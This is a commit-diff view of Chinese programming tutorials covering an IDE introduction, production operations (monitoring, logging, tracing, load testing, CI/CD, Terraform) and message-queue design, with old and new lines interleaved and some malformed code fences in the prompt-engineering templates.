* `git pull`:把云端最新的存档拉取到本地。
- `git push`:把本地存档上传到云端
- `git pull`:把云端最新的存档拉取到本地。
<GitRemoteDemo />
docs/zh-cn/appendix/ide-intro/index.md
+25 -17
View File
@@ -62,6 +62,7 @@
百闻不如一见。为了让你真正感受到 IDE 的便捷,我们为你准备了一个**虚拟的 VS Code 环境**。
**请尝试以下操作**
1. 点击右上角的 **“▶ 开始自动导览”**,跟随光标了解各个区域。
2. **自由探索**:点击左侧图标切换视图,或者点击文件名打开代码。
3. **体验集成**:你会发现,文件管理、代码编辑、终端运行,都在同一个窗口内无缝衔接。
@@ -82,16 +83,18 @@
想象一下,你刚下载好的 VS Code,如果不安装任何插件,它其实**并不懂编程**。
此时的它,本质上只是一个**功能强大的文本编辑器**。
* 它负责显示文字(渲染)。
* 它负责管理文件(IO)。
* 但它不知道 `print("Hello")` 是 Python 代码,也不知道 `int main()` 是 C++ 入口
- 它负责显示文字(渲染)。
- 它负责管理文件(IO
- 但它不知道 `print("Hello")` 是 Python 代码,也不知道 `int main()` 是 C++ 入口。
### 3.2 插件系统:注入“灵魂”
为了让 VS Code 能够“理解”代码,我们需要安装**插件 (Extensions)**。
插件就像是专门的**翻译官**
* **Python 插件**:告诉 VS Code 什么是变量,什么是函数,怎么运行 `.py` 文件。
* **C++ 插件**:告诉 VS Code 如何调用编译器,如何调试内存
- **Python 插件**:告诉 VS Code 什么是变量,什么是函数,怎么运行 `.py` 文件
- **C++ 插件**:告诉 VS Code 如何调用编译器,如何调试内存。
这种设计使得 VS Code 非常轻量——你不写 Java,就不用背负 Java 的运行环境。
@@ -105,14 +108,18 @@
假设你写了一行 Python 代码并点击了**运行**或**调试**:
#### 1. 语言识别 (Activation)
VS Code 检测到 `.py` 后缀,自动唤醒 **Python 插件**。插件立刻接管了编辑器,开始进行语法分析,将代码染上不同的颜色(语法高亮),并提供智能提示。
#### 2. 任务委托 (Delegation)
当你下达指令时,插件本身并不直接执行代码,而是将任务**委托**给底层的专业工具:
* **运行模式**:插件生成一条指令(如 `python main.py`),发送给系统的**终端**去执行。
* **调试模式**:插件启动一个**调试适配器 (Debug Adapter)**。它就像一个“监控探头”,连接到 Python 解释器内部,让你能一行行地控制代码执行。
- **运行模式**:插件生成一条指令(如 `python main.py`),发送给系统的**终端**去执行。
- **调试模式**:插件启动一个**调试适配器 (Debug Adapter)**。它就像一个“监控探头”,连接到 Python 解释器内部,让你能一行行地控制代码执行。
#### 3. 结果反馈 (Feedback)
Python 解释器(或编译器)执行完代码,将结果(或错误信息)返回给插件。插件再把这些信息“搬运”回来,显示在 VS Code 的**底部终端面板**中。
### 3.4 总结:用“餐厅”来打个比方
@@ -120,22 +127,23 @@ Python 解释器(或编译器)执行完代码,将结果(或错误信息
如果觉得上面的公式有点抽象,我们可以把写代码的过程想象成**去餐厅吃饭**:
1. **VS Code 是“餐厅大堂”**
* 这里装修豪华,环境舒适(代码高亮、好看的主题)。
* **但大堂本身不生产食物**。你坐在这里,只是为了更舒服地“点菜”(写代码)。
- 这里装修豪华,环境舒适(代码高亮、好看的主题)。
- **但大堂本身不生产食物**。你坐在这里,只是为了更舒服地“点菜”(写代码)。
2. **环境 (Python/Node) 是“后厨”**
* 这是真正**做饭(运行代码)**的地方。
* 如果餐厅没有后厨(没安装 Python),你在大堂坐到天黑也吃不上饭。
- 这是真正**做饭(运行代码)**的地方。
- 如果餐厅没有后厨(没安装 Python),你在大堂坐到天黑也吃不上饭。
3. **插件 是“服务员”**
* 他连接了大堂和后厨。
* 他看得懂你的菜单,跑去告诉后厨:“3 号桌要一份‘运行 main.py’!”
* 做好了,他又把结果(热腾腾的饭菜)端回到你面前。
- 他连接了大堂和后厨。
- 他看得懂你的菜单,跑去告诉后厨:“3 号桌要一份‘运行 main.py’!”
- 做好了,他又把结果(热腾腾的饭菜)端回到你面前。
**结论**
* 只装 VS Code = **只有大堂没后厨**(只能看,不能吃)。
* 只装 Python = **只有后厨没大堂**(能吃,但得蹲在厨房地上吃,体验很差)。
* **装了 VS Code + 插件 + Python = 完美的就餐体验。**
- 只装 VS Code = **只有大堂没后厨**(只能看,不能吃)。
- 只装 Python = **只有后厨没大堂**(能吃,但得蹲在厨房地上吃,体验很差)。
- **装了 VS Code + 插件 + Python = 完美的就餐体验。**
---
docs/zh-cn/appendix/operations.md
+640
View File
@@ -0,0 +1,640 @@
# 线上运维:从监控到故障排查 (Interactive Guide to Operations)
> 💡 **学习指南**:本章节无需编程基础,通过交互式演示带你了解运维的完整知识体系。从监控告警到故障排查,从容量规划到自动化运维,全面掌握线上系统运维技能。
## 0. 引言:系统上线只是开始
很多新手认为:"代码部署上线,任务就完成了。"
**大错特错!**
系统上线只是**运维工作的起点**。就像买了一辆新车,后续的保养、维修、加油才是常态。
运维的目标有三个:
1. **稳定性 (Stability)**:系统不宕机,服务一直可用
2. **性能 (Performance)**:响应快速,用户体验好
3. **安全 (Security)**:数据不泄露,防止被攻击
---
## 1. 监控体系 (Monitoring)
监控是运维的"眼睛"。没有监控的系统就像盲人开车,出了问题都不知道。
### 1.1 监控的三个层次
<MonitoringDashboardDemo />
**基础设施监控**:关注服务器硬件资源
- CPU 使用率
- 内存使用率
- 磁盘空间和 I/O
- 网络带宽
**应用监控**:关注软件运行状态
- QPS(每秒请求数)
- 响应时间(延迟)
- 错误率
- 依赖服务调用情况
**业务监控**:关注业务健康度
- DAU/MAU(日活/月活)
- 订单量
- 支付成功率
- 用户留存率
### 1.2 监控工具栈
| 工具 | 用途 | 特点 |
| :------------- | :------------- | :----------------------- |
| **Prometheus** | 指标采集与存储 | 时序数据库,适合监控数据 |
| **Grafana** | 可视化面板 | 强大的图表和 dashboard |
| **Zabbix** | 综合监控 | 老牌工具,功能全面 |
| **Datadog** | SaaS 监控平台 | 一站式解决方案,收费 |
**关键点**:监控要分层,从基础设施到业务全方位覆盖,避免"盲区"。
---
## 2. 告警系统 (Alerting)
监控发现问题后,需要及时通知运维人员,这就是**告警**。
### 2.1 告警流程
<AlertFlowDemo />
### 2.2 告警级别设计
合理的告警分级能避免"告警疲劳":
| 级别 | 响应时间 | 典型场景 | 通知渠道 |
| :----- | :-------------- | :------------------------- | :----------------- |
| **P0** | 立即(5分钟内) | 核心服务宕机、支付失败 | 电话 + 短信 + 钉钉 |
| **P1** | 30分钟内 | 部分功能异常、性能严重下降 | 短信 + 钉钉 + 邮件 |
| **P2** | 当天处理 | 资源使用率偏高、偶发错误 | 钉钉 + 邮件 |
| **P3** | 本周处理 | 非核心问题、优化建议 | 邮件 |
### 2.3 告警收敛与降噪
**痛点**:一个小问题可能触发成百上千条告警,导致值班人员麻木。
**解决方案**
1. **告警分组**:相似告警合并(如同一台服务器的多个问题合并为一条)
2. **告警抑制**:如果父问题已触发,子问题不重复告警
3. **静默规则**:维护期间自动暂停告警
4. **频率限制**:同一告警短时间内不重复通知
**关键点**:告警要"少而精",每条都要值得处理。
---
## 3. 日志管理 (Logging)
日志是排查问题的"黑匣子"。
### 3.1 日志分级
```javascript
console.debug('详细调试信息') // 开发时使用
console.info('一般信息') // 正常流程记录
console.warn('警告信息') // 潜在问题
console.error('错误信息') // 需要关注的错误
```
### 3.2 结构化日志
传统日志(不好):
```
2024-01-15 10:23:45 ERROR User john failed to login, attempts=3, ip=192.168.1.100
```
结构化日志(推荐):
```json
{
"timestamp": "2024-01-15T10:23:45Z",
"level": "ERROR",
"message": "User login failed",
"user": "john",
"attempts": 3,
"ip": "192.168.1.100",
"service": "auth-service"
}
```
### 3.3 ELK 日志栈
**ELK = Elasticsearch + Logstash + Kibana**
- **Logstash**:日志采集和过滤
- **Elasticsearch**:日志存储和搜索
- **Kibana**:日志可视化查询
**最佳实践**
- ✅ 敏感信息(密码、token)不要记入日志
- ✅ 关键操作(登录、支付、权限变更)必须记录
- ✅ 日志要包含上下文(用户 ID、请求 ID、时间戳)
- ✅ 定期清理过期日志,避免磁盘爆满
---
## 4. 链路追踪 (Tracing)
在微服务架构中,一个请求可能经过十几个服务,如何追踪它的完整路径?
**Trace ID 和 Span ID**
- **Trace ID**:整个请求链路的唯一标识(像快递单号)
- **Span ID**:单个服务调用的标识(像每个中转站)
### 4.1 分布式追踪演示
<TraceVisualizationDemo />
### 4.2 OpenTelemetry 标准
OpenTelemetry (OTel) 是链路追踪的**行业标准**,提供统一的 API 和 SDK。
```javascript
// 示例:使用 OpenTelemetry 记录 Span
import { trace } from '@opentelemetry/api'
const tracer = trace.getTracer('my-service')
async function processOrder(orderId) {
// 创建一个 Span
const span = tracer.startSpan('processOrder')
try {
// 设置属性
span.setAttribute('order.id', orderId)
// 业务逻辑...
await validateOrder(orderId)
await saveToDatabase(orderId)
span.setStatus({ code: SpanStatusCode.OK })
} catch (error) {
span.recordException(error)
span.setStatus({ code: SpanStatusCode.ERROR, message: error.message })
} finally {
span.end() // 结束 Span
}
}
```
**关键点**:链路追踪能快速定位性能瓶颈和故障点,是微服务必备工具。
---
## 5. 故障排查流程
线上故障不可避免,关键是**快速响应、快速恢复**。
### 5.1 故障处理流程
<IncidentResponseDemo />
### 5.2 常用排查工具
| 工具 | 用途 | 典型场景 |
| :----------- | :----------- | :----------------------- |
| **tcpdump** | 抓包分析 | 网络不通、数据包丢失 |
| **strace** | 追踪系统调用 | 进程卡住、文件权限问题 |
| **Arthas** | Java 诊断 | CPU 飙高、内存泄漏、死锁 |
| **top/htop** | 系统资源监控 | CPU/内存占用高 |
| **netstat** | 网络连接查看 | 端口占用、连接数异常 |
| **lsof** | 查看打开文件 | 文件被占用、磁盘满 |
**Arthas 示例**(阿里开源的 Java 诊断工具):
```bash
# 查看 CPU 最高的前 5 个线程
$ top -H -p 12345
# 查看某个方法的调用耗时
$ trace com.example.OrderService createOrder
# 查看类的静态字段
$ getstatic com.example.Config MAX_CONNECTIONS
# 热更新代码(无需重启)
$ mc /tmp/Test.java
$ redefine /tmp/Test.class
```
### 5.3 故障复盘 (Post-mortem)
**复盘不是追责会!**
复盘的目的是:
1. 梳理故障时间线
2. 找出根本原因 (Root Cause Analysis)
3. 总结经验教训
4. 制定改进措施
**5 Why 分析法**
问"为什么"至少 5 次,找到根本原因:
- 为什么服务宕机?
- 因为内存溢出
- 为什么内存溢出?
- 因为缓存数据过多
- 为什么缓存数据过多?
- 因为没有设置过期时间
- 为什么没有设置过期时间?
- 因为开发时遗漏了
- **根本原因**:缺少代码审查和测试用例
**关键点**:建立 blameless 文化,关注流程改进而非个人责任。
---
## 6. 性能优化
### 6.1 性能瓶颈分析
**从上到下的优化思路**
```
用户感知
前端优化(减少请求、CDN、懒加载)
网络优化(HTTP/2、压缩、长连接)
后端优化(缓存、异步、批处理)
数据库优化(索引、查询优化、分库分表)
系统优化(内核参数、JVM 调优)
```
### 6.2 数据库优化
**索引优化**
```sql
-- 查询慢(无索引)
SELECT * FROM orders WHERE user_id = 12345;
-- 创建索引后快 100 倍
CREATE INDEX idx_user_id ON orders(user_id);
```
**查询优化**
```sql
-- ❌ 避免 SELECT *
SELECT * FROM users WHERE id = 123;
-- ✅ 只查需要的字段
SELECT id, name, email FROM users WHERE id = 123;
-- ❌ 避免 IN 子句太多
SELECT * FROM orders WHERE user_id IN (1, 2, 3, ..., 10000);
-- ✅ 使用 JOIN 或批量查询
SELECT * FROM orders o JOIN user_ids u ON o.user_id = u.id;
```
### 6.3 缓存优化
**多级缓存架构**
```
浏览器缓存 (CDN)
本地缓存 (内存/Guava)
分布式缓存 (Redis/Memcached)
数据库 (MySQL/PostgreSQL)
```
**缓存更新策略**
| 策略 | 优点 | 缺点 | 适用场景 |
| :---------------- | :----------- | :----------- | :----------------------- |
| **Cache-Aside** | 简单、可靠 | 首次查询慢 | 读多写少 |
| **Write-Through** | 数据一致性好 | 写入慢 | 读写均衡 |
| **Write-Behind** | 写入极快 | 可能丢失数据 | 写多读少、允许短时不一致 |
**关键点**:缓存不是银弹,要考虑一致性、雪崩、穿透等问题(参考《系统缓存设计》章节)。
---
## 7. 容量规划
### 7.1 容量评估
<CapacityPlanningDemo />
### 7.2 压力测试
**工具选择**
| 工具 | 特点 | 适用场景 |
| :--------- | :------------------ | :------------ |
| **JMeter** | 功能强大、可视化 | HTTP 接口压测 |
| **wrk/ab** | 轻量、命令行 | 快速基准测试 |
| **Locust** | Python 脚本、分布式 | 复杂场景压测 |
| **K6** | 现代、JS 脚本 | CI/CD 集成 |
**wrk 示例**
```bash
# 安装 wrk
$ brew install wrk # macOS
$ apt install wrk # Ubuntu
# 压测 HTTP 接口(10 线程,持续 30 秒)
$ wrk -t10 -c100 -d30s http://example.com/api/users
# 输出:
# Running 30s test @ http://example.com/api/users
# 10 threads and 100 connections
# Thread Stats Avg Stdev Max +/- Stdev
# Latency 45.32ms 12.45ms 120.50ms 87.56%
# Req/Sec 2.12k 123.45 3.45k 89.01%
# 632450 requests in 30.00s, 1.23GB read
# Requests/sec: 21081.67
```
### 7.3 弹性扩缩容
**云原生时代的自动扩缩容**
```yaml
# Kubernetes HPA (Horizontal Pod Autoscaler)
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
name: my-app-hpa
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: my-app
minReplicas: 2
maxReplicas: 10
metrics:
- type: Resource
resource:
name: cpu
target:
type: Utilization
averageUtilization: 70
```
**当 CPU 使用率超过 70% 时,自动扩容 Pod(最多 10 个)**
**关键点**:结合业务预测(如双 11)提前扩容,避免来不及。
---
## 8. 安全运维
### 8.1 访问控制
**最小权限原则**
- 开发人员只能访问开发环境
- 运维人员只能访问生产环境,且需要审批
- 数据库敏感操作需要二次确认
**堡垒机 (Jump Server)**
所有运维操作通过堡垒机进行,记录完整操作日志。
### 8.2 数据备份
**3-2-1 备份原则**
- **3**份数据副本(1 份原始 + 2 份备份)
- **2**种不同存储介质(本地磁盘 + 云存储)
- **1**份异地备份(防止单点灾难)
**备份策略**
| 类型 | 频率 | 保留时间 | RTO | RPO |
| :----------- | :--- | :------- | :----- | :------ |
| **全量备份** | 每周 | 1 个月 | 4 小时 | 24 小时 |
| **增量备份** | 每天 | 1 周 | 2 小时 | 1 小时 |
| **实时备份** | 秒级 | 7 天 | 分钟级 | 秒级 |
**RTO (Recovery Time Objective)**:恢复时间目标(服务最多中断多久)
**RPO (Recovery Point Objective)**:恢复点目标(最多丢失多少数据)
### 8.3 漏洞扫描
**定期扫描**
- **代码扫描**SonarQube、ESLint(发现潜在漏洞)
- **依赖扫描**npm audit、Snyk(检测第三方库漏洞)
- **容器扫描**:Trivy、Clair(检测镜像漏洞)
```bash
# npm audit 示例
$ npm audit
found 3 vulnerabilities (1 moderate, 2 high)
Package Severity Vulnerable versions
lodash high <4.17.21
express moderate 4.0.0 - 4.18.2
# 自动修复
$ npm audit fix
```
---
## 9. 自动化运维 (DevOps)
### 9.1 CI/CD 流水线
```yaml
# .gitlab-ci.yml 示例
stages:
- test
- build
- deploy
test:
stage: test
script:
- npm install
- npm test
tags:
- docker
build:
stage: build
script:
- docker build -t myapp:$CI_COMMIT_SHA .
- docker push registry.example.com/myapp:$CI_COMMIT_SHA
only:
- main
deploy:
stage: deploy
script:
- kubectl set image deployment/myapp myapp=registry.example.com/myapp:$CI_COMMIT_SHA
environment:
name: production
when: manual # 手动触发部署
```
### 9.2 基础设施即代码 (IaC)
**Terraform 示例**(管理云资源):
```hcl
# main.tf
resource "aws_instance" "web" {
ami = "ami-0c55b159cbfafe1f0"
instance_type = "t2.micro"
tags = {
Name = "WebServer"
Env = "production"
}
}
resource "aws_security_group" "web" {
name = "web-sg"
ingress {
from_port = 80
to_port = 80
protocol = "tcp"
cidr_blocks = ["0.0.0.0/0"]
}
}
```
**优势**
- ✅ 版本控制:所有配置在 Git 中
- ✅ 可重复:环境一致性
- ✅ 可审计:变更历史清晰
- ✅ 可回滚:快速恢复到之前版本
### 9.3 GitOps 实践
**GitOps = Git + IaC + Automation**
核心理念:**Git 仓库是基础设施的唯一真实来源**
工作流程:
```
1. 修改配置文件(push 到 Git
2. Git 仓库变更触发 CI/CD
3. 自动执行terraform apply/kubectl apply
4. 基础设施自动更新
5. 监控对比实际状态与期望状态
```
**工具**ArgoCD、FluxKubernetes 部署)
---
## 10. 总结与最佳实践
运维是一个庞大的体系,但核心可以概括为:
### 10.1 运维成熟度模型
| 等级 | 特征 | 实践 |
| :------- | :----------------- | :----------------------------- |
| **初级** | 被动响应,人工操作 | 出问题才处理,手工部署 |
| **中级** | 自动化,标准化 | CI/CD、监控告警、文档化 |
| **高级** | 预防为主,自愈 | 容量规划、故障演练、自动扩缩容 |
| **专家** | 智能化,无人值守 | AIOps、混沌工程、Serverless |
### 10.2 运维工程师的一天
```
09:00 - 查看夜间告警,确认系统状态
10:00 - 处理用户反馈的问题
11:00 - 参加研发周会,评估新方案运维风险
14:00 - 优化慢查询,提升性能
15:00 - 代码审查(Code Review
16:00 - 编写部署文档,更新监控规则
17:00 - 故障演练(Chaos Engineering
18:00 - 值班交接
```
### 10.3 学习路线
**入门阶段**1-3 个月):
- 学会 Linux 常用命令
- 了解监控系统(Prometheus + Grafana
- 掌握日志查询(ELK
**进阶阶段**3-6 个月):
- 深入理解容器技术(Docker + K8s
- 掌握一门诊断工具(Arthas、tcpdump
- 实践 CI/CD 流水线
**高级阶段**6-12 个月):
- 性能调优(数据库、JVM、网络)
- 容量规划与成本优化
- 故障复盘与流程改进
**专家阶段**1 年以上):
- 架构设计(高可用、容灾)
- 混沌工程(主动注入故障)
- AIOps(智能运维)
---
## 11. 名词速查表 (Glossary)
| 名词 | 全称 | 解释 |
| :-------------- | :-------------------------------- | :--------------------------------------------- |
| **Monitoring** | - | 监控,实时观测系统运行状态。 |
| **Alerting** | - | 告警,异常时通知相关人员。 |
| **Logging** | - | 日志,记录系统运行过程中的事件。 |
| **Tracing** | - | 链路追踪,跟踪请求在分布式系统中的完整路径。 |
| **QPS** | Queries Per Second | 每秒请求数,衡量系统吞吐量。 |
| **Latency** | - | 延迟,请求从发出到响应的时间。 |
| **RTO** | Recovery Time Objective | 恢复时间目标,服务最多中断多久。 |
| **RPO** | Recovery Point Objective | 恢复点目标,最多丢失多少数据。 |
| **Post-mortem** | - | 故障复盘,分析故障原因和改进措施。 |
| **CI/CD** | Continuous Integration/Delivery | 持续集成与持续交付,自动化测试与部署。 |
| **IaC** | Infrastructure as Code | 基础设施即代码,用代码管理服务器、网络等资源。 |
| **GitOps** | - | Git 运维,Git 仓库是基础设施的唯一真实来源。 |
| **ELK** | Elasticsearch + Logstash + Kibana | 日志采集、存储、可视化三件套。 |
| **SLA** | Service Level Agreement | 服务等级协议,承诺的服务可用性(如 99.9%)。 |
| **Blameless** | - | 无责备文化,复盘关注流程改进而非个人责任。 |
---
## 12. 延伸阅读
- **[系统缓存设计](/zh-cn/appendix/cache-design)** - 缓存原理、模式与最佳实践
- **[消息队列设计](/zh-cn/appendix/queue-design)** - 削峰填谷、异步解耦
- **[鉴权原理与实战](/zh-cn/appendix/auth-design)** - 认证授权、安全加固
- **[后端进化史](/zh-cn/appendix/backend-evolution)** - 从单体到微服务到 Serverless
- **[部署与上线](/zh-cn/appendix/deployment)** - 从开发到生产的最后一公里
docs/zh-cn/appendix/prompt-engineering.md
+43 -28
View File
@@ -72,12 +72,15 @@ AI 不知道你要:写给谁、写多长、用什么风格、怎么验收。
当你给 AI 一大段材料时,务必把材料用分隔符包起来,避免它把材料当成指令。
```markdown
````markdown
任务:总结下面的文本,输出 3 个要点。
文本如下(用 ``` 包起来):
```
````
[这里粘贴原文]
```
```
---
@@ -112,6 +115,7 @@ AI 不知道你要:写给谁、写多长、用什么风格、怎么验收。
```markdown
要求:
- 用口语化
- 不要使用专业术语(如必须用,先解释)
- 不要输出长段落(每段 <= 2 句)
@@ -161,9 +165,10 @@ AI 不知道你要:写给谁、写多长、用什么风格、怎么验收。
```markdown
任务:……
要求:
1) 先输出一个「计划/检查清单」(3-7 条)
2) 等我确认后,再输出最终结果
输出:先只给计划,不要直接生成结果
1. 先输出一个「计划/检查清单」(3-7 条)
2. 等我确认后,再输出最终结果
输出:先只给计划,不要直接生成结果
```
这样你可以先把方向对齐,再让它生成内容,省很多时间。
@@ -184,12 +189,12 @@ AI 不知道你要:写给谁、写多长、用什么风格、怎么验收。
### 6.2 常见“问题 → 修法”
| 问题 | 常见原因 | 最快修法 |
| :--- | :--- | :--- |
| 输出太长 | 没有限制长度 | 加字数/要点数上限 |
| 风格不稳定 | 没有示例/受众 | 指定受众 + 给 2 个示例 |
| 格式不对 | 没说输出格式 | 直接给格式模板,并要求“只输出” |
| 漏步骤 | 任务太复杂 | 先计划/检查清单 |
| 问题 | 常见原因 | 最快修法 |
| :--------- | :------------ | :----------------------------- |
| 输出太长 | 没有限制长度 | 加字数/要点数上限 |
| 风格不稳定 | 没有示例/受众 | 指定受众 + 给 2 个示例 |
| 格式不对 | 没说输出格式 | 直接给格式模板,并要求“只输出” |
| 漏步骤 | 任务太复杂 | 先计划/检查清单 |
---
@@ -250,28 +255,32 @@ AI 不知道你要:写给谁、写多长、用什么风格、怎么验收。
```markdown
任务:把下面文本总结给“忙碌的老板”。
要求:
- 3 个要点
- 1 句结论
要求:
- 3 个要点
- 1 句结论
- 1 个下一步建议
输出:Markdown
文本:
输出:Markdown
文本:
```
[粘贴原文]
```
```
### 9.2 抽取类(给程序用)
```markdown
`````markdown
任务:从文本中抽取信息。
输出:只输出 JSON(不要解释)。
JSON 结构:\n{\n \"title\": \"\",\n \"date\": \"\",\n \"people\": [],\n \"actions\": []\n}\n文本:\n```\n[粘贴原文]\n```\n```
JSON 结构:\n{\n \"title\": \"\",\n \"date\": \"\",\n \"people\": [],\n \"actions\": []\n}\n文本:\n`\n[粘贴原文]\n`\n```
### 9.3 代码审查类(先计划再输出)
```markdown
你是资深工程师。\n任务:审查下面代码。\n要求:\n1) 先列检查清单(3-5条)\n2) 再列问题(现象/原因/修复)\n3) 最后给修复片段\n代码:\n```\n[粘贴代码]\n```\n```
````markdown
你是资深工程师。\n任务:审查下面代码。\n要求:\n1) 先列检查清单(3-5条)\n2) 再列问题(现象/原因/修复)\n3) 最后给修复片段\n代码:\n`\n[粘贴代码]\n`\n```
---
@@ -289,12 +298,18 @@ JSON 结构:\n{\n \"title\": \"\",\n \"date\": \"\",\n \"people\": [],\n \
## 11. 名词速查表 (Glossary)
| 名词 | 解释 |
| :--- | :--- |
| Prompt(提示词) | 你给模型的输入指令。 |
| Role(角色) | 指定回答口吻/身份的开关。 |
| Constraints(约束) | 长度、要点数、必须包含/避免等可检查规则。 |
| Few-shot(少样本) | 通过示例让模型学会输出风格与格式。 |
| Plan-first(先计划) | 先输出计划/清单,再生成最终结果,减少跑偏。 |
| 名词 | 解释 |
| :----------------------- | :------------------------------------------- |
| Prompt(提示词) | 你给模型的输入指令。 |
| Role(角色) | 指定回答口吻/身份的开关。 |
| Constraints(约束) | 长度、要点数、必须包含/避免等可检查规则。 |
| Few-shot(少样本) | 通过示例让模型学会输出风格与格式。 |
| Plan-first(先计划) | 先输出计划/清单,再生成最终结果,减少跑偏。 |
| Prompt Injection(注入) | 把外部材料伪装成“指令”,试图让模型越权执行。 |
| Self-check(自检) | 让输出附带核对项,方便你验收。 |
| Self-check(自检) | 让输出附带核对项,方便你验收。 |
````
`````
```
```
docs/zh-cn/appendix/queue-design.md
+735
View File
@@ -0,0 +1,735 @@
# 消息队列设计:从原理到实战 (Interactive Guide to Message Queues)
> 💡 **学习指南**:本章节带你深入理解后端系统的"缓冲器"——消息队列。我们将从最基础的"为什么要用队列"讲起,一步步掌握消息队列的核心模式、可靠性保证、以及实战中的架构设计。
<MessageQueueDemo />
## 0. 引言:系统的"缓冲器"
你在淘宝买完东西,为什么点击"支付"后,不会立刻收到短信通知?
你在抖音发了一条评论,为什么点赞数不是瞬间就增加?
这背后都有一个功臣:**消息队列 (Message Queue)**。
如果同步调用是"打电话",那消息队列就是"发微信"。
打电话要求对方**立即响应**(同步),发微信可以等对方**稍后处理**(异步)。
### 0.1 为什么要用消息队列?
只有一个理由:**解耦和削峰**。
- **解耦**:A 不需要直接调用 B,把消息扔给队列就完事了。
- _例子_:用户下单后,订单服务不需要直接调用库存、积分、通知服务,而是发一条"下单成功"消息。
- **削峰**:把瞬间的高峰流量"摊平",避免系统被打爆。
- _例子_:秒杀活动,1 秒内有 10 万个请求,但数据库只能处理 1000 个。队列把这 10 万个请求暂存起来,慢慢处理。
<PeakShavingDemo />
**关键点**:消息队列的本质是**异步通信**,通过把"立即执行"变成"稍后处理",提升系统的吞吐量和可用性。
---
## 1. 第一步:理解消息队列的核心概念
### 1.1 消息队列的三要素
1. **生产者 (Producer)**:发送消息的一方。
- _例子_:订单服务(下单成功后发送消息)。
2. **消息代理 (Broker)**:存储和转发消息的中介。
- _例子_RabbitMQ、Kafka、RocketMQ。
3. **消费者 (Consumer)**:接收并处理消息的一方。
- _例子_:库存服务(扣减库存)、短信服务(发送通知)。
<MessageQueueComponentsDemo />
### 1.2 消息模式 (Messaging Patterns)
#### 点对点 (Point-to-Point)
一条消息只能被**一个消费者**消费。
- _场景_:任务分配(如批量导入 Excel,分发给多个工作节点处理)。
- _特点_:负载均衡,多个消费者竞争消费。
#### 发布订阅 (Pub/Sub)
一条消息可以被**多个消费者**同时消费。
- _场景_:事件通知(如用户注册后,同时发邮件、发短信、发放优惠券)。
- _特点_:广播,每个订阅者都能收到完整消息。
<PointToPointVsPubSubDemo />
**关键点**:点对点是"任务分配",发布订阅是"事件通知"。
---
## 2. 主流消息队列对比
| 特性 | RabbitMQ | Kafka | RocketMQ | Redis Stream |
| :----------- | :----------------- | :----------------- | :------------------ | :--------------- |
| **定位** | 传统消息队列 | 分布式日志系统 | 电商级消息队列 | 轻量级队列 |
| **吞吐量** | ~1 万/秒 | ~100 万/秒 | ~10 万/秒 | ~5 万/秒 |
| **延迟** | 微秒级 | 毫秒级 | 毫秒级 | 毫秒级 |
| **可靠性** | 高(持久化) | 高(多副本) | 高(同步/异步刷盘) | 中(AOF 持久化) |
| **消息顺序** | 支持(单队列) | 支持(分区内) | 支持 | 支持 |
| **消息回溯** | 不支持 | 支持 | 支持 | 支持 |
| **学习曲线** | 中 | 高 | 高 | 低 |
| **适用场景** | 传统业务、任务队列 | 日志收集、流式处理 | 电商、金融 | 小规模、简单队列 |
### 2.1 如何选择?
- **RabbitMQ**
- ✅ 需要复杂的路由规则(如根据订单类型分发到不同队列)。
- ✅ 对延迟敏感(要求微秒级响应)。
- ✅ 团队熟悉 AMQP 协议。
- **Kafka**
- ✅ 吞吐量极大(百万级 TPS)。
- ✅ 需要消息回溯(重新消费历史数据)。
- ✅ 大数据生态(Flink、Spark 集成)。
- **RocketMQ**
- ✅ 电商、交易场景(事务消息、顺序消息)。
- ✅ 金融级可靠性要求。
- ✅ 需要定时消息、延迟消息。
- **Redis Stream**
- ✅ 小团队、MVP 项目。
- ✅ 已经有 Redis,不想引入新组件。
- ⚠️ 不适合对可靠性要求极高的场景。
<MessageQueueComparisonDemo />
**关键点**:没有最好的消息队列,只有最适合的。初学者可以从 RabbitMQ 或 Redis Stream 入手。
---
## 3. 核心设计模式
### 3.1 异步处理 (Asynchronous Processing)
把同步调用改成异步,提升响应速度。
**场景**:用户注册流程
```python
# 同步方式(总耗时 = 1500ms)
def register(username, password):
save_user(username, password) # 300ms
send_email(username) # 500ms
send_sms(username) # 400ms
give_coupon(username) # 300ms
return {"status": "success"}
# 异步方式(总耗时 = 300ms
def register(username, password):
save_user(username, password) # 300ms
# 发送消息到队列,立即返回
mq.publish("user.registered", {
"username": username,
"timestamp": time.time()
})
return {"status": "success"}
# 后台消费者(慢慢处理)
def handle_user_registered(data):
send_email(data["username"])
send_sms(data["username"])
give_coupon(data["username"])
```
**效果**:接口响应时间从 1500ms 降到 300ms,用户体验大幅提升。
### 3.2 削峰填谷 (Peak Shaving)
用队列缓冲高峰流量。
**场景**:秒杀活动
```
用户请求 (10 万/秒)
[网关层] 限流:只放行 1 万/秒
[消息队列] 缓冲 9 万/秒
[订单服务] 持续处理 1000/秒
```
```python
# 生产者:秒杀接口
def seckill(user_id, product_id):
# 快速校验
if not redis.is_available(product_id):
return {"error": "已售罄"}
# 扔进队列,立即返回
mq.publish("seckill.order", {
"user_id": user_id,
"product_id": product_id,
"timestamp": time.time()
})
return {"status": "排队中"}
# 消费者:后台处理订单
def handle_seckill_order(data):
user_id = data["user_id"]
product_id = data["product_id"]
# 扣减库存(数据库可以慢慢处理)
success = db.deduct_stock(product_id, user_id)
if success:
create_order(user_id, product_id)
mq.publish("order.created", {...})
else:
mq.publish("order.failed", {...})
```
<SeckillQueueDemo />
**关键点**:用户不需要等待真实处理完成,只要"排队成功"就满足预期。
### 3.3 系统解耦 (Decoupling)
消除服务之间的直接依赖。
**场景**:订单系统 → 通知系统
```python
# 紧耦合(不好)
def create_order(user_id, product_id):
order = db.create_order(user_id, product_id)
# 直接调用,如果通知服务挂了,订单就创建失败
notification_service.send_sms(user_id, "订单创建成功")
notification_service.send_email(user_id, "订单创建成功")
return order
# 松耦合(好)
def create_order(user_id, product_id):
order = db.create_order(user_id, product_id)
# 发送消息,不管通知服务是否在线
mq.publish("order.created", {
"order_id": order.id,
"user_id": user_id
})
return order
# 通知系统独立消费
def handle_order_created(data):
# 如果通知服务挂了,消息会暂存在队列里,等它恢复后再处理
send_sms(data["user_id"], "订单创建成功")
send_email(data["user_id"], "订单创建成功")
```
**好处**
- 订单系统不依赖通知系统。
- 可以随时增加新的消费者(如积分系统、大数据分析)。
- 通知系统升级不影响订单系统。
<CouplingDemo />
### 3.4 数据分发 (Data Distribution)
一条消息分发给多个消费者。
**场景**:用户行为分析
```python
# 用户点击了商品
